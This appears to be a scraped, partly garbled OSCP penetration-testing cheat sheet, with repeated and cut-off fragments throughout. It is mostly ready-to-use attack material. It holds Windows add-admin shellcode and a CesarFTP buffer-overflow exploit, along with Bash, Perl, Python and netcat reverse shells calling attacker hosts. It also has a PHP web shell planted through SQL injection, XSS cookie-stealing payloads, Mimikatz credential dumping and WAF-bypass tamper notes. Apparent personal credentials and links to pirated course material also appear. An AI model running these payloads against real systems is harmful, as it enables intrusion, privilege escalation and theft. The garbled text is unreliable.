CheatSheets OSCP
CheatSheets OSCP
CheatSheets OSCP
-----------------
Title: Add Admin User Shellcode (194 bytes) - Any Windows Version
Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3
Username: BroK3n
Password: BroK3n
-----------------
char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03
\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b
\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a
\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf
\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f
\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69
\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63
\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44
\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33
\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65
\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63
\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7;
Discoveryorofautomatic.
methods Missing Patches
Manually this can be done easily be executing the following
command which will enumerate all the installed patches.
Metasploit
the Knowledge Base number and specifically patches for which there is a Metasploit
module.
$ post/windows/gather/enum_patches
PowerShell
Sherlock(https://github.com/rasta-mouse/Sherlock) and it will check a system for the
following:
Operating System
Windows Server 2016
Windows Server 2008 ,7,8,10 Windows Server 2012
Windows Server 2008, Vista, 7
Windows Server 2003, Windows Server 2008, Windows 7, Windows 8, Windows 2012
Windows Server 2003, Windows Server 2008, Windows Server 2012, 7, 8
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows XP, Windows Server 2003
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2008, 7
Windows Server 2003, Windows Server 2008, 7, XP
Windows Server 2003, XP
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2003, XP
Windows Server 2003, XP
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2003, Windows Server 2008, 7, 8, Windows Server 2012
Windows Server 2003, Windows Server 2008, 7, XP
Windows Server 2003, Windows Server 2008, 7, XP
Description Security Bulletin KB
Windows Kernel Mode Drivers MS16-135 3199135
Secondary Logon Handle MS16-032 3143141
WebDAV MS16-016 3136041
Windows Kernel Mode Drivers MS15-051 3057191
Win32k.sys MS14-058 3000061
AFD Driver MS14-040 2975684
Windows Kernel MS14-002 2914368
Kernel Mode Driver MS13-005 2778930
Task Scheduler MS10-092 2305420
KiTrap0D MS10-015 977165
NDProxy MS14-002 2914368
Kernel Driver MS15-061 3057839
AFD.sys MS11-080 2592799
NDISTAPI MS11-062 2566454
RPC MS15-076 3067505
Hot Potato MS16-075 3164038
Kernel Driver MS15-010 3036220
AFD.sys MS11-046 2503665
Exploit
Exploit
Github
ExploitDB
Metasploit
Github
ExploitDB
Metasploit
ExploitDB
Metasploit
ExploitDB
Github
Metasploit
ExploitDB
GitHub
Metasploit
ExploitDB
GitHub
Metasploit
ExploitDB
Github
Github
Metasploit
ExploitDB
ExploitDB
Github
PowerShell
HotPotato
GitHub
ExploitDB
EXE
ExploitDB
############LINUX#####################
research the target machine on linux
using uname -a determine the kernel and see if there is a know privilege escalation
www.exploit-db.com/exploits/18411/
download in target machine --- notes potential machine ip ends with 240
compile
gcc exploit.c -o exploit
run it done ;D you got root privileges
read the lab guide for more references video 82
###############WINDOWS#####################
notes on privilege escalation in windows
ms011 this bug is classic example user mode to windows kernel with uncheckbuffer overwrite kernel space.
gain system level execution windows xp and windows 2003 32bit and 64.
python exploit
www.exploit-db.com/exploits/18176/
install the dependencies needed in the tools directory aka py installer and other file in tools folder
then copy the exploit to that folder and compile
updates reduce
adminstrative error
mishandling file and folder user permission allow privilege ecalation
windows service
doesn't take care file permission full and read and write access to service
the malicious file executed with system privilege
#lab example
net user lowpriv mypass /add
net localgroup "Remote Desktop users" lowpriv /add
check a services.msc
services.smc
integrity controlist
icacls on the service exe
to check if the services is Everyone and Administrators
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Everyone:(CI)(F)
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n'). Useful to bypass
Replaces space
Replaces space character
character ('
(' ')
') with
with comments
a pound character ('#')
'/**_**/' followed
Useful by a random
to bypass string
weak and and a web
bespoke new application
line ('\n'). Useful to bypass
firewalls
Replaces space character (' ') with comments '/**_**/' Useful to bypass weak and bespoke web application firewalls
Replaces space character (' ') with a pound character ('#') followed by
aUseful
random string and
to bypass a new
several web line ('\n')
application firewalls. Used during the
Replaces space character (' ') with
ModSecurity SQL injection challenge a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n'). Useful to bypass several web applicati
Replaces space
Replaces space character
character ('
(' ')
') with
with aa random
pound character ('#') followed
blank character from aby a new
valid set line ('\n'). Useful
of alternate to bypass several web applicati
characters.
Replaces space character (' ') with a random blank character from a valid set of alternate characters.
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web applicatio
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n'). Useful to bypass several web applicatio
Replaces space character (' ') with plus ('+'). Is this any useful? The plus get's url-encoded by sqlmap engine invalidating the q
view jmp_esp.png
create payload:
buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"
Modify exploit:
#!/usr/bin/python
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [[email protected]]
#Date: 10.06.2006
buf = ""
buf += "\xbe\x91\xab\x8d\xbd\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b"
buf += "\xc9\xb1\x18\x83\xed\xfc\x31\x75\x0f\x03\x75\x9e\x49"
buf += "\x78\x41\x91\x56\xe7\x31\x92\x58\x63\x05\x18\x12\x23"
buf += "\x9a\xab\x36\x4f\xd0\x8b\x9b\xe2\x5b\xc8\xe5\xc1\x51"
buf += "\xfd\xb6\x0b\xe3\xee\xc2\x06\x03\x7b\x91\xea\x98\x37"
buf += "\x1f\x6b\x14\x8b\x12\x97\x2b\xfa\xa6\xe6\x73\xfd\x50"
buf += "\x63\xf2\xc1\xa1\x9a\xf6\x50\xae\x31\x93\xa3\xc4\xb7"
buf += "\x9c\x73\x8f\xd0\xa2\xdb\xa7\x2a\x4b\x19\xc8\x2b\x37"
buf += "\x94\x29\x78\xf0\xaa\xfa\x2e\xa9\xe3\x96\xc0\x04\x54"
buf += "\x31\x1e\x43"
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
host = sys.argv[1]
port = 21
user = "ftp"
password = "ftp"
EIP = 0x77fb59cc #JMP ESP from ntdll.dll
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send(buffer)
print s.recv(1024)
s.close()
Create handler:
Launch exploit:
len: 844
get a shell:
meterpreter >
get proof.txt:
On my machine:
privilege escalation:
see system_shell.png
168.23.10 LPORT=444 R | msfencode -b '\x00\x09\x0a\x0d\x22\x25\x26\x27\x2f\x3a\x3e\x3f\xFF\x5c' -t python
PAYLOAD=windows/meterpreter/reverse_ord_tcp e
PAYLOAD=windows/meterpreter/reverse_ord_tcp e
https://sathisharthars.wordpress.com/2015/01/28/oscp-offensive-security-certified-professional-handy-tips-and-tric
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scrripts/vulscan
Nikto Scanner:
WordPress Scanner:
Uniscan Scanning:
Skipfish Scanning:
2)fargement
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
nc -v -w 1 target -z 1-1000
US Scanning:
Unicornscan Scanning:
Kernel Scanning:
nmblookup -A target
rpcclient -U “” target
enum4linux target
SNMP ENumeration:
snmpwalk -v 1 -c public IP
snmpbulkwalk -v 2 -c public IP
Plink Tunnel:
Mimikatz:
privilege::debug
sekurlsa::logonPasswords full
Netcat commands:
c:> nc -l -p 31337
#nc 192.168.0.10 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 192.168.0.10 31337 > secret.txt
Banner Grabbing:
nc 192.168.0.10 80
GET / HTTP/1.1
Host: 192.168.0.10
User-Agent: SPOOFED-BROWSER
Referrer: K0NSP1RACY.COM
<enter>
<enter>
Python:
PID:
cd /root/.wine/drive_c/MinGW/bin
wine ability.exe
NASM Command:
nasm -f bin -o payload.bin payload.asm
SSH Pivoting:
use auxiliary/server/socks4a
run
searchsploit-rb –update
Metasploit Payloads:
msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell
msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh
msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php
# lsof +L1
# getent group
pattern create
pattern offset (EIP Address)
pattern offset (ESP Address)
add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
SEH:
!mona suggest
!mona nosafeseh
nseh=”\xeb\x06\x90\x90″ (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)
ROP (DEP):
!mona modules
!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’
!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)
ASLR:
!mona noaslr
EGG Hunter:
break *_start
Continue Execution :
continue
c
Data :
$17 = 13
Reverse Shellcode:
BASH:
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $l
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1
PERL:
RUBY:
PHP:
This code assumes that the TCP connection uses file descriptor 3.
NETCAT:
Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:
TELNET:
XTERM:
To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do th
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xt
xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab
xhost +targetip # Run this INSIDE the spawned xterm on the open X Server
xhost + # Run this INSIDE the spawned xterm on the open X Server
xhost + # Run this INSIDE the spawned xterm on the open X Server
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
Or:
$ DISPLAY=attackerip:0 xterm
$ DISPLAY=attackerip:0 xterm
Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
PHP:
<script>document.location=http://IP:PORT</script>
‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83
”;!–“<XSS>=&amp;{()}
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(‘XSS’)>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&
<IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#00001
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
“><script >alert(document.cookie)</script>
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E
http://www.0daysecurity.com/penetration-testing/enumeration.html
Windows Shellcode:
http://farlight.org/index.html?type=shellcode
http://shell-storm.org/shellcode/
http://www.windowsexploits.com/
http://www.xenuser.org/xss-cheat-sheet/
https://gist.github.com/sseffa/11031135
https://html5sec.org/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
http://roo7break.co.uk/?p=215
Webshells:
http://www.r57shell.net/
Nikto Tutorial:
http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/
Exploit-db:
wget http://exploit-db.com/archive.tar.bz2
SNMP Enumeration:
http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09
http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html
SAMBA Enumeration:
http://www.iodigitalsec.com/windows-null-session-enumeration/
http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html
http://www.madirish.net/59
Passhing The Hash:
https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/
Hashcat Tutorial:
http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/
Wordlist Download:
https://wiki.skullsecurity.org/Passwords
http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html
NASM Tutorial:
http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
Buffer overflow Tutorial:
I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains expl
Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2
ADVANCED:
Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most
Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/
Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009
Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www
Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
http://resources.infosecinstitute.com/backdoor-sql-injection/
RFI/LFI Tutorials:
https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
http://www.hackersonlineclub.com/lfi-rfi
https://0xzoidberg.wordpress.com/category/security/lfi-rfi/
NMAP Vulsan:
http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
http://www.objectif-securite.ch/
http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
Windows Previlige Escalation:
http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
http://www.fuzzysecurity.com/tutorials/16.html
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
http://pentestmonkey.net/tools/audit/unix-privesc-check
http://www.rebootuser.com/?p=1758
Useful Links:
Videos:
http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)
https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)
https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)
https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)
Those who have not enough lab time to compile their windows exploit, I will recommend you to download and compile
https://www.securitysift.com/offsec-pwb-oscp/
I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that becoz exploit comp
http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv
I Hopes, It will helpful for guys who doing OSCP Training and Exam. If any doubts related to the post ping me…
About these ads
Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp
fessional-handy-tips-and-tricks/
ons /t REG_DWORD /d 0
PORT=443 RHOST=IP E
“<|<=” | sort -k3
-e x86/shikata_ga_nai -b “\x00″ -t c
-e x86/shikata_ga_nai -b “\x00″ -t c
r: while read line 0<&5; do $line 2>&5 >&5; done
DIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
DIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
$~->fdopen($c,w);system$_ while<>;’
$~->fdopen($c,w);system$_ while<>;’
me(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/
me(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/
open(cmd,”r”){|io|c.print io.read}end’
open(cmd,”r”){|io|c.print io.read}end’
”r”){|io|c.print io.read}end’
”r”){|io|c.print io.read}end’
&%d 2>&%d”,f,f,f)’
&%d 2>&%d”,f,f,f)’
EAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”
(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCod
#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&
#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp
http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
henticated-smb-sessions
hashcat-0156543/
he Grey Corner explains exploit from basic to intermediate level with step by step debugging.
01/beginning-stack-based-buffer-overflow.html
10/01/seh-stack-based-windows-buffer-overflow.html
er.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
/grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
rner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever s
x.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
w.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
hp/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
lan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
it development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plu
R – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep
be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
e:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
ed-overflows/
rage that becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at
, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional
(STDERR,”>&S”);exec(“/bin/sh -i”);};’
(STDERR,”>&S”);exec(“/bin/sh -i”);};’
ubprocess.call([“/bin/sh”,”-i”]);’
ubprocess.call([“/bin/sh”,”-i”]);’
PT>alert(String.fromCharCode(88,83,83))</SCRIPT>
mp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&am
mp;amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&
me to time that I have ever seen).
xample-part-3b/
-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
tack-cookies-safeseh-hw-dep-and-aslr/
sing Visual Studio and GNU Code-blocks, really it will very useful at the time of exam.
anyone need that mail me at [email protected] (Note: don’t try to bruteforce it, its more than 20 words)
d Professional
mp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;>
0108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#00
mp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041>
&amp;#0000041>
Sans 710: https://mega.nz/#!QNRxSaLY!sRHMVAyZ8f9Fqaq2O-g-5dVmU4WfIczgeaMz98kPGps
Sans 560: http://certcollection.org/forum/topic/292558-mega-sans-560-network-penetration-testing/
Sans 517: http://certcollection.org/forum/topic/292541-mega-sans-517-cutting-edge-hacking-techniques/
Sans 531: http://certcollection.org/forum/topic/292540-mega-sans-531-sans-windows-command-line-kung-fu/
Sans 617: http://certcollection.org/forum/topic/292539-mega-sans-617-wireless-ethical-hacking-penetration-testing-
Sans 506: http://certcollection.org/forum/topic/292493-mega-sans-506-securing-linuxunix/
Sans 508: http://certcollection.org/forum/topic/292127-mega-sans-508-advanced-digital-forensics-and-incident-resp
Sans 503: http://certcollection.org/forum/topic/292121-mega-sans-503-intrusion-detection-in-depth/
Sans 502: http://certcollection.org/forum/topic/292106-mega-sans-502-perimeter-protection-in-depth/
Sans 401: http://certcollection.org/forum/topic/292086-mega-sans-401-security-essentials/
Sans 610: http://certcollection.org/forum/topic/288694-mega-sans-610-reverse-engineering-malware/
Sans 660: http://certcollection.org/forum/topic/288708-mega-sans-660-advanced-pentration-testing-exploits-gxpn/
https://lab.pentestit.ru/
alok.3181
qwerty@123
mega.nz
5>]Y$gj@W<gC4JHJ
Awesome CTF
Captf.com -- search github
#CTF #wargame
https://io.netgarage.org/
http://reversing.kr/index.php
https://exploit-exercises.com/
http://smashthestack.org/
https://www.root-me.org/?page=news&lang=en
https://www.pwnerrank.com/categories/binary-exploitation/
https://w3challs.com/
https://pwnable.tw/
https://www.vulnhub.com/
https://ctftime.org/ctfs
https://shellterlabs.com/en/
l-forensics-and-incident-response/
ion-in-depth/
ction-in-depth/
ring-malware/
ation-testing-exploits-gxpn/
-filenames-word-lists-collection/
reverse_shell_all:
https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
whereis gcc
-----------php----------
upload below as .png or sent it as part of input
<? readfile("/etc/passwd"); ?>
<? echo('test') ?> - test in burp if works, replace test with base64 of reverse php shell
Try in burp:
<?php
$out = file_get_contents($_REQUEST['f']);
echo "<pre>$outt</pre>";
?>
if works, cmd injection present, try below:
<?php
$cmd = ($_REQUEST["cmd"]);
$outt = exec($cmd);
in browser hash.php
try hash.php?cmd=pwd
nc -c /bin/sh 192.168.56.101 5600
nc -lvp 5600
python -c 'import pty; pty.spawn("/bin/bash")'
remote execution functions :: https://sekurak.pl/backdoory-w-aplikacjach-php/
echo "<pre>$outt</pre>";
?>
Below can be used with id and password box as well and then bd.php?cmd=ls
union select '<?php system($_GET["cmd"]); ?>', '' into outfile '/var/www/bd.php'#
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorek
whereis nc
/bin/nc.traditional 192.168.0.192 443 -e /bin/sh
for scan:
us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.1.88
echo os.system('/bin/bash')
get root if mysql running as root: (login to mysql ==> mysql -h localhost -u root -p , check for pass in config or using sqlm
)
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
https://bernardodamele.blogspot.in/2009/01/command-execution-with-mysql-udf.html
mysql> select sys_exec('usermod -a -G admin john');
smbservice:
nmblookup -A ip
smbclient -L \\SHARE -I IPaddress -N
rsa-key predict:
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_20
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPF
ssh -i 57c3115d77c56390332dc5c49978627a-5429 [email protected]
showmount -e ipaddress
if result /* then
mkdir /metafs # this will be the mount point
mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking
//privilege escalation
/var/mysqli_connect.php has root password
ssh using this password
mount_nfs_share:
to check mount -e ipaddress
mkdir /tmp/nfs
